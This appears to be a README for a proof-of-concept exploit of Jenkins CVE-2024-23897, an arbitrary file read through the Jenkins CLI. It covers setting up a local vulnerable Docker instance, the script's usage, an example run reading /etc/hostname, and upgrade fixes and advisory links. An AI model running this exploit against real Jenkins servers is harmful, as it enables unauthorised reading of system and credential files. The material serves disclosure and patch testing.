Share
## https://sploitus.com/exploit?id=5D31F81D-FA5D-54A4-AB47-1E44CDFB0608
# Jenkins CVE-2024-23897 PoC

A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.

**Affected Versions**

- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2

## Set up a vulnerable instance

Spin up a local vulnerable instance using docker compose:

```bash
cd docker
docker compose up -d
```

The instance will be available at `http://localhost:1234`

## Exploitation

```bash
โฏ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)
```

**Example**

```bash
โฏ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed
```

The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability take at a look at my [blog post on the topic](https://abraxas.pages.dev/blog/cve-2024-23897/).

## Fix

- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the [Jenkins security advisory](https://www.jenkins.io/security/advisory/2024-01-24/).

## Related Links

- [Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/)
- [Jenkins Security Advisory - 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/#binary-files-note)
- [Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)](https://threatprotect.qualys.com/2024/01/29/jenkins-core-remote-code-execution-vulnerability-cve-2024-23897/)
- [CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability โ€“ Horizon3.ai](https://www.horizon3.ai/cve-2024-23897-assessing-the-impact-of-the-jenkins-arbitrary-file-leak-vulnerability/)